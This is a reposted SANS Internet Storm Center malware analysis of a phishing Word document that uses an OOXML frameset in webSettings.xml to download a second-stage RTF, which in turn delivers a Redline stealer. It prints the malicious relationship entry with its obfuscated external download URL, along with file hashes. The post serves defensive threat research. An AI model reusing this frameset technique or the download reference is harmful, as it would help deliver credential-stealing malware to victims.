Malicious Word Document with a Frameset, (Thu, Sep 15th)

Windows logo - 2012
File:Windows logo – 2012.svg

This is definitively new, but I did not see this type of document for a while. I spotted a malicious Word OOXML document (the new “.docx” format) that is a simple downloader. Usually, malicious documents contain an embedded file, a VBA macro, or the recent vulnerability MS-MSDT[1]. This time, the document does not contain any malicious code but just refers to a second stage that will be delivered when the document is opened.

OOXML Microsoft documents support HTML elements such as… framesets! Think about an iframe in an HTML document; we have a similar capability to place text in some places in a document. This feature is not visible by default in Word, but you can enable the feature and create them using Word[2]. Because OOXML documents are ZIP archives, they can be tweaked to implement a frameset and make it point to another payload. 

The document I spotted uses this technique. It was delivered via a phishing campaign and called “Order Confirmation 22839.docx” (SHA256:2382d4957569aed12896aa8ca2cc9d2698217e53c9ab5d52799e4ea0920aa9b9). In the ZIP archive, let’s have a look at the “webSettings.xml” file:

[email protected]:/MalwareZoo/20220915$ Order Confirmation 22839.docx
Index Filename                        Encrypted Timestamp           
    1 [Content_Types].xml                     0 1980-01-01 00:00:00 
    2 _rels/.rels                             0 1980-01-01 00:00:00 
    3 word/_rels/document.xml.rels            0 1980-01-01 00:00:00 
    4 word/document.xml                       0 1980-01-01 00:00:00 
    5 word/theme/theme1.xml                   0 1980-01-01 00:00:00 
    6 word/settings.xml                       0 1980-01-01 00:00:00 
    7 word/fontTable.xml                      0 1980-01-01 00:00:00 
    8 word/_rels/webSettings.xml.rels         0 2022-09-14 11:02:52 
    9 docProps/app.xml                        0 1980-01-01 00:00:00 
   10 word/styles.xml                         0 1980-01-01 00:00:00 
   11 docProps/core.xml                       0 1980-01-01 00:00:00 
   12 word/webSettings.xml                    0 1980-01-01 00:00:00 
[email protected]:/MalwareZoo/20220915$ Order Confirmation 22839.docx -s 12 -d | pretty


We have indeed a frameset that is referenced by id ‘rId1’. References are defined in “.rels” files:

[email protected]:/MalwareZoo/20220915$ Order Confirmation 22839.docx -s 8 -d| pretty

    <Relationship Id="rId1" Target="http://1806445755/...--------------.....----------------............----------------/....92.doc" TargetMode="External" Type=""/>

Note that the payload will be automatically downloaded with interaction with the user. Just a popup will be displayed:

The payload (“92.doc”) is a classic malicious RTF document (SHA256:dd1a1537774ef9680ff376a4baed81c90b11a521ef4c69ffd23edfa59eaa1300). It downloads the real malware from the following URL:


The malware is a Redline stealer[3] (SHA256:7d2b174c017d61fcd94673c55f730821fbc30d7cf03fb493563a122d73466aab) talking to the following C2 server:



Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Alex Post